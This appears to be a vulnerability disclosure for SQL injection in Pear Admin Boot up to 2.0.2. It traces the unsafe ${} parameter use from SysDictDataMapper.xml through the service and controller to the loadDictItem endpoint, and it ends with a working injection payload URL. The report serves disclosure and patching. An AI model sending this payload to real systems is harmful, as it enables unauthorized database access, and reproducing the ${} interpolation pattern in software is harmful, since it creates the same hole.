Vulnerability Product:Pear Admin Boot
Vulnerability version:<=2.0.2
Vulnerability type:sql injection
Vulnerability Details:
First, in com/pearadmin/modules/sys/mapper/xml/SysDictDataMapper.xml, we found that ${} was used to pass in the three parameters of text, code, and table, so there was SQL injection. Now let's find out how to pass the parameters.
In com/pearadmin/modules/sys/mapper/SysDictDataMapper.java:62, we found the queryTableDictByKeys method declared. Now let’s find where this method is called again.
Find the method call in com/pearadmin/modules/sys/service/impl/SysDictDataServiceImpl.java:101, and then look up
Next, we found that the queryTableDictByKeys method was called in com/pearadmin/modules/sys/controller/SysDictDataController.java:127. The text, code, and table variables can be assigned values through the /system/dictData/loadDictItem/{{dictCode}} interface, and the parameter values are passed in through the path.
Finally, our payload is as follows
http://localhost:8088/system/dictData/loadDictItem/sys_user,user(),1?key=1